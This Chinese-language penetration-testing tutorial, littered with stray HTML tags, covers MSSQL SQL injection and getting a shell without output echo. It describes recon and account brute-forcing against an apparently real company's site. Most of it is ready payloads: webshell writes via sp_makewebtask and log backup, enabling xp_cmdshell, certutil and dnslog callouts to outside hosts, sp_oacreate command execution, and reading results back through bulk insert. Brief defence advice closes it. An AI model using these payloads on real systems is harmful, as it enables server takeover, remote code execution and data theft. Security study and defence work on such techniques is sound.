MSSQL注入与无回显Getshell技术详解<\/h1>

一、前期信息收集<\/h2>

目标定位<\/strong>：<\/p>

通过扫描二维码获取公司名称<\/li>
使用公司名称进行百度搜索，定位数据中心<\/li>
通过FOFA搜索IP发现旁站<\/li> <\/ul> <\/li>

账号爆破<\/strong>：<\/p>

使用Burp Suite爆破"常见用户名Top500"<\/li>
成功获取三个账号及其中一个密码<\/li> <\/ul> <\/li>

系统信息收集<\/strong>：<\/p>

数据库类型：MSSQL 2012<\/li>
权限级别：dbo权限<\/li>
操作系统：Windows 6.2(Server 2012)<\/li> <\/ul> <\/li> <\/ol>
二、SQL注入发现与利用<\/h2>

注入点发现<\/strong>：<\/p>

密码字段添加单引号触发SQL报错<\/li>
确认存在SQL注入漏洞<\/li> <\/ul> <\/li>

万能密码登录<\/strong>：<\/p>

使用万能密码进入后台，但仅获得游客权限<\/li> <\/ul> <\/li> <\/ol>
三、MSSQL Getshell技术详解<\/h2>
1. Webshell写入技术<\/h3>
1.1 sp_makewebtask方法<\/h4>

前提条件<\/strong>：<\/p>

dbo或sa权限<\/li>
对目标路径有写权限<\/li>
sp_makewebtask扩展存在<\/li> <\/ul> <\/li>

利用步骤<\/strong>：<\/p> <\/li> <\/ul>
';create table cmd (a image)-- <\/span><\/span><\/span>'<\/span>;insert<\/span> into<\/span> cmd(a) values<\/span>(0<\/span>x616263)-- <\/span><\/span><\/span><\/span>';execute sp_makewebtask @outputfile='<\/span>D:\<\/span>test\<\/span>1<\/span>.txt','<\/span>@<\/span>query=<\/span>'select a from cmd'<\/span>-- <\/span><\/span><\/span><\/span>';drop table cmd-- <\/span><\/span><\/span><\/code><\/pre>1.2 日志备份(Log Backup)方法<\/h4> 前提条件<\/strong>：<\/p> 数据库设置为完整恢复模式<\/li> 知道网站绝对路径<\/li> <\/ul> <\/li> 利用步骤<\/strong>：<\/p> <\/li> <\/ul> ;alter<\/span> database<\/span> 数据库名称<\/span> set<\/span> RECOVERY FULL<\/span> -- <\/span><\/span><\/span><\/span>;create<\/span> table<\/span> cmd (a image) -- <\/span><\/span><\/span><\/span>;backup log db_name to<\/span> disk =<\/span> 'E:\test\test.aspx'<\/span> with<\/span> init -- <\/span><\/span><\/span><\/span>;insert<\/span> into<\/span> cmd (a) values<\/span> ('hex_webshell'<\/span>)-- <\/span><\/span><\/span><\/span>;backup log 数据库名称<\/span> to<\/span> disk =<\/span> 'E:\test\test.aspx'<\/span> -- <\/span><\/span><\/span><\/code><\/pre>2. 站库分离判断<\/h3> 使用以下命令判断是否为站库分离：<\/li> <\/ul> @@<\/span>servername ><\/span> 0<\/span> <\/span><\/span>select<\/span> host_name ><\/span> 0<\/span> <\/span><\/span><\/code><\/pre>四、无回显命令执行技术<\/h2> 1. xp_cmdshell扩展<\/h3> 启用与使用<\/strong>：<\/li> <\/ul> EXEC<\/span> sp_configure 'show advanced options'<\/span>, 1<\/span> <\/span><\/span>RECONFIGURE <\/span><\/span>EXEC<\/span> sp_configure 'xp_cmdshell'<\/span>, 1<\/span> <\/span><\/span>RECONFIGURE <\/span><\/span><\/code><\/pre> 命令执行测试<\/strong>：<\/li> <\/ul> ;exec<\/span> master..xp_cmdshell 'ping xxx.dnslog.cn'<\/span> <\/span><\/span>;exec<\/span> master..xp_cmdshell 'certutil -urlcache -f -split http:\/\/xxx\/'<\/span> <\/span><\/span>;exec<\/span> master..xp_cmdshell 'nslookup xxx.dnslog.cn'<\/span> <\/span><\/span><\/code><\/pre>2. sp_oacreate扩展<\/h3> 无回显命令执行<\/strong>：<\/li> <\/ul> ;declare<\/span> @<\/span>shell int <\/span><\/span>exec<\/span> sp_oacreate 'wscript.shell'<\/span>,@<\/span>shell output<\/span> <\/span><\/span>exec<\/span> sp_oamethod @<\/span>shell,'run'<\/span>,null<\/span>,'c:\\windows\\system32\\cmd.exe \/c whoami > c:\\1.txt'<\/span> <\/span><\/span><\/code><\/pre> 结果读取技术<\/strong>：<\/li> <\/ul> create<\/span> table<\/span> testa(line text); <\/span><\/span>bulk insert<\/span> testa from<\/span> 'c:\\1.txt'<\/span> with<\/span> (fieldterminator=<\/span>'n'<\/span>,ROWTERMINATOR=<\/span>'nn'<\/span>); <\/span><\/span>and<\/span> 1<\/span>=<\/span>(select<\/span> top 1<\/span> *<\/span> from<\/span> 数据库名<\/span>..testa FOR<\/span> XML PATH(''<\/span>)) <\/span><\/span><\/code><\/pre>五、常见问题与解决方案<\/h2> 无法进行大容量加载<\/strong>：<\/p> 可能原因：命令未执行完成<\/li> 解决方案：等待后重试<\/li> <\/ul> <\/li> 二进制截断问题<\/strong>：<\/p> 可能原因：字段长度限制<\/li> 解决方案：使用findstr过滤所需内容<\/li> <\/ul> <\/li> <\/ol> 六、防御建议<\/h2> 输入验证<\/strong>：<\/p> 对所有用户输入进行严格过滤<\/li> 使用参数化查询<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 遵循最小权限原则<\/li> 限制数据库账户权限<\/li> <\/ul> <\/li> 安全配置<\/strong>：<\/p> 禁用不必要的存储过程(xp_cmdshell, sp_oacreate等)<\/li> 定期更新和打补丁<\/li> <\/ul> <\/li> 监控与日志<\/strong>：<\/p> 实施全面的日志记录<\/li> 设置异常行为告警<\/li> <\/ul> <\/li> <\/ol> 七、总结<\/h2> 本文详细介绍了MSSQL注入的各种技术手段，特别是在无回显环境下的Getshell方法。从基础的信息收集到高级的命令执行技术，涵盖了实际渗透测试中可能遇到的各种场景。安全人员应了解这些技术以更好地防御，同时强调这些技术仅用于合法授权的安全测试。<\/p>